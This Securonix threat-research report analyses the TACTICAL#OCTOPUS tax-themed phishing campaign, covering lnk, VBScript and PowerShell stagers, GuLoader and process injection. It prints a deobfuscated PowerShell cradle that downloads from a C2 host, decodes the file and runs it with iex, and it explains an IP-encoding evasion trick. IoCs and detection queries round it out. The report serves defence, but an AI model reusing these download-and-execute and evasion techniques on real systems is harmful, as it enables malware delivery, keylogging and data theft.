By Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov
March 30, 2023, updated April 5, 2023, updated April 18, 2023
Update: TACTICAL#OCTOPUS Campaign continues targeting US victims
While today is the last day for US income tax submissions, the TACTICAL#OCTOPUS campaign continues to target US victims. New samples have once again emerged related to this ongoing threat.
The GuLoader/CloudEyE malware appears to be the primary malware used to deliver other payloads. Interestingly enough, most of the heavily obfuscated stagers that the Threat Research team tracked initially, were no longer used. Instead, the shortcut file downloads and executes the GuLoader malware directly.
Like the original infection stage, the malware is delivered to the user via a phishing email using tax-themed lures. The email contains an attached zip file containing the shortcut containing the malicious script which looks similar to the original.
Figure u_1: Lnk execution
The GuLoader malware is downloaded from hxxps://rebrand[.]ly/spf5wcc and saved as C:\Windows\Tasks\Restler.com, and the lure document is downloaded from hxxps://rebrand[.]ly/uvhzh3f and saved as C:\Users\Public\info.pdf.
The malware along with the lure document are executed simultaneously. Per usual, the lure document is another tax-related file.
Figure u_2: lure document
Once the GuLoader binary launches, it sleeps for roughly 30 to 60 seconds and then performs process hollowing to one of two IE utilities, the Internet Explorer Low-MIC Utility Tool, ielowutil.exe or ieinstal.exe as we saw previously.
Figure u_3: GuLoader process hollowing to ieisntal.exe
Without going into too much detail, the malware eventually connects back to hxxp://rebrand[.]ly/spf5wcc to download further stagers as well as for persistence.
The Securonix Threat Research Team is keeping a close eye on the TACTICAL#OCTOPUS campaign and will provide updates as we learn more. It’s possible that with the tax season wrapping up in the US that this campaign might shift away from tax-themed lures.
Additional payloads
File Name |
SHA256 (IoC) |
Shortcut Files |
FedTaxUS.pdf.lnk |
3fc89d5e3e55c0942c6093eef47d87da6c52d6c459a1ad385ae425bd70863b42 |
Zip Files (email attachments) |
FedTaxUS20&21.zip |
6a45856a160185b57a2e0c059f7eced75d3117a2ead0d75c649b50d9077bdf7f |
Binary Files |
Sinsring Lnningsraadenes.exe |
3a76d26eb6d4267c47730b002111153f17deb9ae39bbaedacc1caa7c49d1447e
4d0ebfef45b40e93ec400103685032aadcb2f3427a8a2faa9a70db31bd7e81eb |
Update: TACTICAL#OCTOPUS campaign continues as more malicious phishing documents emerge
Since the discovery of the TACTICAL#OCTOPUS campaign, the Securonix Threat Research team has been monitoring this ongoing threat and has uncovered additional related samples and payloads. The most recent of these samples were submitted 04/04/2023.
Overall, the attack chain appears to have remained the same. A phishing email with a password-protected zip file is delivered to the target using tax-themed lures. However, one noticeable difference is that the attackers have shifted from encoded IP addresses to using known, publicly available URL redirect services, in particular rebrand[.]ly. At the time of writing, the redirect URLs have been blocked by the redirect service.
At this point in time it is safe to assume that the TACTICAL#OCTOPUS campaign is still ongoing and will likely continue (or shift gears) once the tax season in the US wraps up for the April 18th deadline. We will continue to monitor the situation and provide updates as we learn more.
Additional payloads
File Name |
SHA256 (IoC) |
Shortcut Files |
|
WINSTON_TAXARCHIVE.pdf.lnk |
29201f916b42e013f24a8a0b2543c25ec04e119b4d0969ddd8aff696f84af7ee |
FedTaxUS.pdf.lnk |
de78ba7cedda5de72f399a0bd7b597e880ebd517144bbeb2dd0a4e12d353d749 |
CLIENTCOPY.pdf.lnk |
fd90d38b7ba7a28b3416c917f8e1f1a670e861fecb9d7402b1aea76ac380589a |
SharonYarbrough.pdf.lnk |
d739b7a71406d2bc16e579db6edab6c12bc26dab43b0b293e5bd817a185c7b43 |
Zip Files (email attachments) |
|
JHNGLE8879.zip |
95d7840b69fb0e9541422fa841389992e19b3502ee59ad6ad86449211f3b8407 |
SharonYarbrough.zip |
7c5a0ee020e8fb14be5955ee7231191b61f3e077edf638304b046f7d780663bc |
C2-hosted files |
|
WATPCSP.dll |
a5ac856ce08f5526b013044067e1e74ce5aedf695a4a964025349059800ea763 |
tl;dr
As the tax deadline on April 15 approaches in the US, threat actors are ramping up tax-related phishing scams to US-based victims to infect systems with stealthy malware.
With tax season in the US drawing to a close, threat actors are showing no sign of slowing down. The Securonix Threat Research team has identified an ongoing hyper-targeted phishing campaign (tracked by Securonix Threat Research as TACTICAL#OCTOPUS) targeting individuals in the US using seemingly valid tax forms and contracts. Some of the lure documents observed contained employee W-2 tax documents, I-9, and real estate purchase contracts.
However, behind the lure document attachment is interesting malware which features stealthy AV evasion tactics, layers of code obfuscation and multiple C2 (command and control) channels. In this article, we’ll walk through the stages and peel back the obfuscated code to get a better understanding of the malware and attack chain.
Attack chain overview
The attack begins with tax-related phishing emails. The email will contain a password-protected zip file, where the password is provided in the body of the email. The attachments follow a common naming convention using tax-like language such as TitleContractDocs.zip or JRCLIENTCOPY3122.zip.
Contained within the .zip file is a single image file (typically a .png file) and a shortcut (.lnk) file. Code execution begins when the user double clicks the shortcut file.
Once code execution begins, a series of VBScript and PowerShell stagers pull further payloads from the C2 server. Eventually we’ll observe in-memory binary code execution through PowerShell reflection techniques using legitimate Windows processes.
Stage 1: initial infection
Code execution begins when the victim user extracts the .zip file contents and executes the shortcut file masquerading as a .pdf link “MOREZT TAX FILES.pdf.lnk”. As seen in the figure below, the .lnk file contains a PowerShell one liner command that downloads the Visual Basic file “Sammenstyrtningens242.vbs” from the attacker’s C2 server, saves it locally as “C:\Windows\Tasks\Tepolerd.vbs” and then runs it.
Figure 1: TACTICAL#OCTOPUS shortcut file information including executed command line
…encoded IP addresses?
Hold up, let’s pause for a second and talk about that odd looking URL. Believe it or not, it is simply an encoded IP address and there is no DNS resolution of any kind happening behind the scenes. This IP address obfuscation method is documented, but rarely used especially when it comes to mixed notation; however, some IP obfuscation tools can be found online. If you were to copy the URL into your browser or terminal window, you’ll notice that it will be automatically translated into an IP. Let’s describe how this works using a known safer example (Open DNS): 208.67.222.123
The value is essentially a combination of hexadecimal and decimal encoding of an IP address. The first IP octet is encoded using hex, separated by a dot. The remaining octets are then decimal encoded.
0xD0.4447867 essentially translates to 208.67.222.123
The IP address used by the attacker’s .lnk code: 0x05.526436 becomes 5.8.8[.]100
Oddly enough, this method to hide IP addresses only works where at least the first octet is hex encoded. Decimal encoding the first octet with hex proceeding will not work. The graphic below breaks this down with some examples:
Figure 2: Encoded URL examples
Continuing on, the PowerShell script also downloads a file called “info.pdf” and saves it to the local public user’s directory in “C:\Users\Public\infos.pdf”. Once downloaded it is then opened and presented to the user from whatever application is configured as the default PDF viewer.
All the file samples our team analyzed were various forms of tax documents, though none could be verified as being valid. These ranged from several employee W-2 forms to I-9 documents, to real estate contracts. The two W-2 tax forms below appear to be from an Okta employee and another employee of Murray Logan Electricals and Wiring.
These documents are known as lure documents to provide the victim user with an expected result to the action taken (opening a “PDF” file). Even though the goal of the attacker is code execution, a user may get suspicious when nothing happens, hence the need for a valid lure.
Figure 3: A sample of various lure documents
Next, let’s circle back to the downloaded .VBS script that gets downloaded and executed just before the lure document opens.
Stage 2: VBS script execution
The VBS script that gets executed from the shortcut file, “Sammenstyrtningens242.vbs” is heavily obfuscated. It contains mostly nonsensical comments, likely to try to bypass or confuse AV detection.
Figure 4: Obfuscated VBScript example
As you can see in the figure above, there is a concatenated PowerShell script contained within the VB script file. This gets executed by the default PowerShell.exe process.
Stage 3: PowerShell execution
The obfuscation methods used in this PowerShell script are a bit unconventional. It involves a function that manipulates any string called into it. Each of the strings (represented in green) are passed into the function “Unrhe9” and converted into valid PowerShell syntax that can then be executed.
Figure 5: Obfuscated PowerShell script extracted from VB code
The deobfuscated version of the PowerShell script gives us a bit better understanding as to the script’s intent. Overall, the script is quite interesting due to the fact that each line gets invoked individually. Technically, the invokes could be dropped to further enhance readability.
Figure 6: Deobfuscated PowerShell script
Compounding the variables in the deobfuscated version of the script we get the final few commands that kick off the next phase of code execution.
Start-BitsTransfer -Source “hxxp://5.8.8[.]100/signal/Traverser.dwp” -Destination $env:appdata\Kommaerp.ema
$Unrhe = Get-Content $env:appdata\Kommaerp.ema
$Moatingh = [System.Convert]::FromBase64String($Unrhe));
$Told2 = [System.Text.Encoding]::ASCII.GetString($Moatingh))
$Astrologi=$Told2.substring(183983,19725));
iex($Astrologi)
The same C2 server is now contacted once again to download the file Kommaerp.ema and save it to the user’s Appdata directory (“C:\Users\username\AppData\Roaming”). The file is downloaded using the Start-BitsTransfer PowerShell module.
The Kommaerp.ema file contains a giant Base64 string that gets decoded and parsed by the next few lines of code. The last line simply invokes whatever contained PowerShell code is present as a result as represented by the $Astrologi variable.
Stage 4: PowerShell execution
The next phase of PowerShell execution is derived from the $Astrologi variable as we discovered in the previous stage. Once again, we see another massively obfuscated script as shown in the figure below.
Figure 7: Stage4 obfuscated PowerShell script
Similar to what we saw in stage 3, obfuscation is mainly handled by a primary function that decodes all of the passed in strings throughout the remainder of the script. Manually deobfuscating the strings using the “Elkaunq02” function makes the PowerShell script a bit more readable.
Figure 8: Stage 4 deobfuscated PowerShell script in-memory binary execution
If you’re familiar with PowerShell in-memory code execution, the code above should look familiar. Similar versions of the same code have been seen in the wild executing a wide range of attacks from Cobalt Strike, to a wide range of backdoor RAT malware including Kovter. It essentially leverages .NET API functionality to allocate memory space for a payload that will be executed within the new memory space.
A new thread is then spawned from our original process containing the payload data. The data in this case is contained inside the $Moatingh variable. This variable was instantiated during stage 3 of the attack. If you look back, you’ll notice the variable is set to the Base64 decoded value of the download file “Kommaerp.ema”.
$Coerciona2=$env:appdata
$Coerciona2=$Coerciona2+’\Kommaerp.ema’
$Unrhe = Get-Content $Coerciona2
$Moatingh = [System.Convert]::FromBase64String($Unrhe));
The second half of the file contains the obfuscated stage 4 PowerShell code which we analyzed in the previous section.
Binary payload analysis
The Windows binary file ieinstal.exe ends up being the victim process for our in-memory process injection technique. This default Windows process is located in C:\Program Files (x86)\Internet Explorer\ and is responsible for installing and managing Internet Explorer add-ons.
In the below figure we’re able to observe the malware migrating from PowerShell and launching ieinstal.exe which then spawns its own thread. The shell code used to inject the process contained within the Kommaerp.ema file is heavily obfuscated at a binary level, however we’ll get into how we’re able to gather some interesting data from the created process.
Figure 9: Procmon: PowerShell to ieinstal.exe process
ieinstal.exe memory dump analysis
Examining the process dump file for ieinstal.exe provides some interesting insights. First, we observed C2 communication back to the original IP address (5.8.8[.]100) from the infected process. Analyzed data within the memory dump confirms that the IP is contacted using the following parameters:
GET /signal/TpRIfutRxWlhn224.dwp HTTP/1.1
User-AgentMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
At this stage, the infection chain is completed and the attackers will have access to the target system. Without pulling additional files from the C2 server, we observed ieinstal.exe capturing clipboard data and keystrokes as soon as it started running.
Additional sample analysis
In addition to the sample featured in this article, we identified several additional samples following the same pattern using unique IP addresses and URL strings. Overall, each sample followed striking similarities such as the tax related PDF (always info.pdf), and PowerShell/VBScript code.
All files and hashes will be provided at the end of the article for references or IoCs.
C2 infrastructure and attribution
Two of three IP addresses identified in the attack were registered to Petersburg Internet Network Ltd. in the Russian Federation. This could indicate Russian origins, however the possibility of false flag operations cannot be ruled out at this point.
IP Address |
Country |
ISP |
194.180.48[.]211 |
US |
Des Capital B.V. |
5.8.8[.]100 |
RU |
Petersburg Internet Network Ltd. |
109.206.240[.]67 |
RU |
Petersburg Internet Network Ltd. |
C2 domains/IPs |
hxxp://109.206.240[.]67/oy/ |
tcp://goodisgood[.]ru:1977 |
hxxps://rebrand[.]ly/25a1ba |
hxxps://rebrand[.]ly/be263e |
hxxps://rebrand[.]ly/m526mvn |
hxxps://rebrand[.]ly/rzuw9uy |
hxxps://rebrand[.]ly/spf5wcc |
hxxps://rebrand[.]ly/uvhzh3f |
Full URLs |
hxxp//194.180.48[.]211/nini/ |
hxxp//194.180.48[.]211/sara/ |
hxxp://194.180.48[.]211/oy/ |
hxxp://194.180.48[.]211/zarath/ |
hxxp//194.180.48[.]211/fresh/ |
hxxp//194.180.48[.]211/ryan/ |
hxxp//5.8.8[.]100/signal/ |
hxxp//109.206.240[.]67/xlog/ |
hxxp//109.206.240[.]67/anom/ |
hxxp//109.206.240[.]67/shitter/ |
Conclusion
Since all the samples that Securonix Threat Research identified are fairly recent, it’s clear that this campaign is still ongoing. Businesses and individuals should be extra vigilant when opening tax-related emails, especially as the tax deadline in the US approaches.
The TACTICAL#OCTOPUS campaign is overall relatively complex from an initial compromise standpoint. The initial code execution tactic through .lnk file execution is trivial and used by many threat actors these days. However, the PowerShell and VBScript code used are unique and sophisticated, especially from an AV avoidance and obfuscation standpoint making this campaign important to watch.
Securonix recommendations and mitigations
- Avoid opening any attachments especially those that are unexpected or are from outside the organization. Be extra vigilant with tax-related emails.
- Implement an application whitelisting policy to restrict the execution of unknown binaries.
- Deploy additional process-level logging such as ⦁ Sysmon and ⦁ PowerShel⦁ l logging for additional log detection coverage.
- Securonix customers can scan endpoints using the Securonix Seeder Hunting Queries below.
MITRE ATT&CK Matrix
Tactic |
Technique |
Initial Access |
T1566: Phishing
T1566.001: Phishing: Spearphishing Attachment |
Execution |
T1204.002: User Execution: Malicious File
T1059.001: Command and Scripting Interpreter: PowerShell
T1059.003: Command and Scripting Interpreter: Windows Command Shell
T1059.005: Command and Scripting Interpreter: Visual Basic
T1204.001: User Execution: Malicious Link |
Defense Evasion |
T1055.009: Process Injection: Proc Memory
T1620: Reflective Code Loading |
Command and Control |
T1573.001: Encrypted Channel: Symmetric Cryptography
T1105: Ingress Tool Transfer |
Exfiltration |
T1041: Exfiltration Over C2 Channel |
Analyzed file hashes
File Name |
SHA256 (IoC) |
Shortcut Files |
|
MOREZT TAX.jpg.lnk |
0d1dad9f09654d9f111e2e4d9451708237f2129cb674c380057938ea7a7ba4bf |
JRCLIENTCOPY3122.pdf.lnk |
5ac2a9e27896c467eb5363ab24c931a5b721c3a715590441a936eb49b06dfb3e |
BETTYGILDOC.pdf.lnk |
1dc173bba60254b915f8fa88f2ee5730f8d9ba3919ffa7c7a3cc28c3728c43ec |
TitleContractDocs.pdf.lnk |
ff6c37680217620045135d6ec7ac0f7ca7560d8e189c701837f335e45d3213de |
FIELDSGOVTCOPY2021.pdf.lnk |
2893eab39fa7bd0db75cb5657565e04f1a438e6397f7fd2990f0a03e9954bbc0 |
PaulajonesClienttaxs2022.pdf.lnk |
fc06588222dd51a08f9359e5d6ce9ee8c2ae90ff700533bc47d2ab4ead0071e8 |
BrentFisherUSTax.pdf.lnk |
562ec1673c90fd1932f60b0f4e26e02a059347b88aa2d8fc0bddd058427d6946 |
Doc065754.lnk |
86a3eea0abb10bdcac6a00b9bdf1d76a408fbdd27db8be389757e069a2855f11 |
1099R 2022.pdf.lnk |
63559daa72c778e9657ca53e2a72deb541cdec3e0d36ecf04d15ddbf3786aea8 |
PANYANG_21FED_1040.lnk |
23597910ec60cf8b97144447c5cddd2e657d09e2f2008d53a3834b6058f36a41 |
Doc436985.pdf.lnk |
76c22709a51448a508852f449d1b756d45754150093d6a5fb5eaef34673bbd82 |
W2&1040.pdf.lnk |
0cea74786657ad2094759e2a512a648efecf9a33d6ce3ee0c7ac1840dbf276cc |
S_K _Beaumont_TaxDocuments.pdf.lnk |
ab1eb7454d2cc5549c4c09422cdeb2fbf9254a977a42b03ca887a42d4e66f84e |
Information.pdf.lnk |
6e3b660bd913e1bd538811501fbc42ad9f4786c8258b7120e76d671c23252403 |
Chargeback_Dispute_Details.pdf.lnk |
46c5b1f2090450b537389b1e221f7264a460fe47387e746555ba0543c0782ef9 |
S _Moretz_TaxDocuments.pdf.lnk |
e72dc71684d57785129e128b05212467e528912106c8fe63c25baacbf0340ea5 |
Zip Files (email attachments) |
|
JRCLIENTCOPY3122.zip |
907756fb841a1ed62e245a9d97b8c8ead78fa4fb6ec4357088f283e8db4f62f4 |
TitleContractDocs.zip |
e45adb5a0dcfde2f3a70d2d4e91d6bcaec54858c61f0ecce3fc76d8cf6cf12e6 |
FIELDSGOVTCOPY2021.zip |
4080b180ba4b33becc75686bc7f739a7d0ca6df446f3f6749bcd7a356c76ce66 |
saxton_returns.zip |
1b3d2a6e04de259510090506a7357bdeced4f8c2c95607359837b105409abad0 |
2022_docs.zip |
f79c1d0ddadc7222e3eaa82416f515ef263ae6b3ba2a8d87f4f458b2ef98e8ea |
BRENTFISHER_FEDTAXES.zip |
34bdc88439fa6c06be4fa4b8a1747366157e71f196a20686366b8dacaf9e3ffc |
PanYangFederalUSTaxDocs.zip |
2f2892ce3885179c5ddd3ced5f8e3ae5f890ed0cef989f62a0285de136e31fa3 |
FedTax_Docs_BrentF.zip |
8ab6933a480b546996a19daa13a7b5b0429099bfea57d42055f97fe9d3e251cf |
S_K _Beaumont_TaxDocuments.pdf.zip |
e4a600fe6f9928350d460b97162569d32e6acf70c7fe3ada68cbb6e861eeb972 |
Chargeback_Dispute_Details.zip |
a639cb71f6f021a531d79c4ec2c9b22c5244874f6c959135d843e1db3476b1f4 |
S _Moretz_TaxDocuments.pdf.zip |
d562a9e5cd1dc88de6308986d68edfd90dd0111f7971ec252dd09f12eb2f8b1a |
C2-hosted files |
|
EAbsGhbSQL10.aca |
7BD663EA34E358050986BDE528612039F476F3B315EE169C79359177A8D01E03 |
info.pdf |
057B1DA6363EEDC2156003B8547AC57116793278B0B0B21767CC05FC8B143B99
6E641DE68BFD6AB98E297704AB27F784CDE401EAAA2D3F7D8653553C60F977DA
85E27758A4ED4B7754B8003DE1313540678F216BD21D883F03C2512BC89C32DC
000BC200B6BA104AC05DCBCB9B54A4F9610D8190AB5F9A4A1A5B189B0057F006 |
Leekish.vbs |
C914DAB00F2B1D63C50EB217EEB29BCD5FE20B4E61538B0D9D052FF1B746FD73 |
safe.exe |
A373F01A9CD3E3DB683AB892027C1A529BDB7F1F8A8C114BE940CD10A27366C7 |
CEAdePBiyVNfeZZlA176.lpk |
CF55584023A70E43EC2637532CC8150C00F007825F705EF07DCEF39C9F6B74EF |
Kriminalromaners.vbs |
88B917C71897D8D516A5386818E83A62CC210FD52B52EE069875E56D5142E015 |
RHyiKHQlrxxrmvViuoCaYwH64.pfb |
EF7FB7AF43F7CE46209DA523F6B168DE225694760F2E8243158D65BEB31827DE |
Unsquee.dwp |
0DABFF6F0DD86D59A869F2633F4EEBC31A96B70BF90ED8E766CA22B49F68459C |
Untuber88.vbs |
E5FD42C20D0C95EDD3E1D12DDC4DDBE99A4F2ADECFE0A14250DED98F189599A1 |
Vejlensisk90.vbs |
FFE477577469C87C606E0CBD9D0DA68446CD8D895E4F4AB0A083F0A05AC8AB20 |
Blotlg.vbs
Jubilets1.vbs
Tepolerd.vbs |
20D129D8AD727DC816FAC7AB3DC4D3D3F3666220822DE0D722DB763FA138A246 |
waRzdUl247.pfb |
09B1FD66B0EC4B57861DB145BF4CEFFF0EE5634EB5A156D04D04F8495D309DAB |
ytcJMQnIg146.toc |
0A542E1D7444DF99461DE2CA49A3859AA1A35B458F8F77B205AEA0D14E6620A2 |
DWKZN62.u32 |
73E714EE977BA7C4CD32F52539F94031B52FCAA90448CEAEB910FD22932E9D4E |
FhQgGIViPzDcYLTxWDvRglZ48.afm |
C5BE50F35FBDA3FD8B996659FE3B1A648AC3EB4DED45825A0C158A1303CDAE5A |
Hygiastic.psm |
DD7E1D8F39581E3F90E51E082E11344EED2668C0377439D769DDF5422B4C66FB |
ImnkLSwWhaQsuZXYPs172.pcx |
27806A2C2A1246965D0E15D20DC6F3D46DF0CB242C3296311F40DD63991CD02C |
JKmoXyx233.prx |
149EE334DC6CD0593AEC294F405A9390623AB198080B476122433048402F93B4 |
Palatophar.pcx |
FC1F9FC56F9B87242D205D67C40E5772C0A510650D83F1B7429DD037754C8EAF |
Pilhenv.vbs |
34A689FC4CA1F0B001BEE4B0640487E98FCE0C67EC67CDF076D86EFE9B10072F |
PwkejoRQqhGAqogDJJHh197.afm |
EF1065677B256644113648CAA26D75512BEA881C4953396DA561EAE8231F56F3 |
Sammenstyrtningens242.vbs |
926FE7F70C86B5C16A632344191820206772F8C53AC075446B138D209A1BF22A |
Sammenstyrtningens242A.vbs |
87DC4E513A7023F1B8D38499C6FEDE4E6AB7EC563E1F0DBBD5E9B365E213D145 |
TpRIfutRxWlhn224.dwp |
18D7BE1DFAED274670EA6CDD3D45E864CDCA173D5E71753DC69910334D0A92FA |
Traverser.dwp |
2CF0F2C5D665438AC31A6B2880CD8FF637E7D4339781B5F2D26E7BC6058B737F |
Categ31.xlsx |
E1C6E7D919EEBE7CF75D5ACBAE975BB4AD3C760FF303714297E9F7072DF582D0 |
Midd.dwp |
E587FB76C736B268FCA167994649B09401FEF04A433F6C28480C315C83181E24 |
MqYHDjH134.pcz |
F2D64F2CC3902C13E457656C06E2AF1B4E11EC3F60E3EBC5D8F9E7BB3E673296 |
Eksegese64.vbs |
C8BE839ED95D6BCFD484BA7A9389BA0A56CFD8841C9FDE04FE5651ED853BEE1A |
Eksegese641.vbs |
F0382214714ADC0D3C71FC5CD63F99F17F6A2E0A3CF45378CDAF236770793D65 |
jrJzeVzMzpIxWFk86.prx |
4DBD53B7CE4753778B1C2375A21FC4641E36D57880579779B376D4D8B591C6F7 |
nWsxW93.smi |
E03E3C2C78A20A58E6B9546F62DCE95233362EEE7534785CE0B79F7F0886BA5B |
PetYUsaYzfzGCi67NW.psm |
6E5163D9B9992847CAB46D48C691C2A04F6D01E5B430DEA02AA2A8119C299047 |
A Sample of relevant Securonix detection policies:
- EDR-ALL-1197-RU
- EDR-ALL-1198-RU
- PSH-ALL-227-RU
- PSH-ALL-228-RU
- PSH-ALL-313-RU
Relevant Spotter queries
- index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (destinationprocessname ENDS WITH “powershell.exe” OR filename = “PowerShell.EXE” OR destinationprocessname ENDS WITH “cmd.exe” OR filename = “Cmd.Exe”) AND (resourcecustomfield1 CONTAINS “https://0x” OR resourcecustomfield1 CONTAINS “http://0x”)
- (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR rg_functionality = “Web Proxy”) AND (destinationaddress = “194.180.48[.]211” OR destinationaddress = “5.8.8[.]100” OR destinationaddress = “109.206.240[.]67”)
- index = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS ” -bxor”
- index = activity AND rg_functionality = “Microsoft Windows Powershell” AND (message CONTAINS “System.Reflection.Assembly.Load($” OR message CONTAINS “[System.Reflection.Assembly]::Load($” OR message CONTAINS “[Reflection.Assembly]::Load($” OR message CONTAINS “System.Reflection.AssemblyName” OR message CONTAINS “Reflection.Emit.AssemblyBuilderAccess” OR message CONTAINS “Runtime.InteropServices.DllImportAttribute”) AND (message NOT CONTAINS “Generated by= Microsoft Corporation” OR message NOT CONTAINS “Generated by: Microsoft Corporation”)
- index = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS “Start-BitsTransfer” AND message CONTAINS “-Source” AND message CONTAINS “-Destination” AND message CONTAINS “http”
References: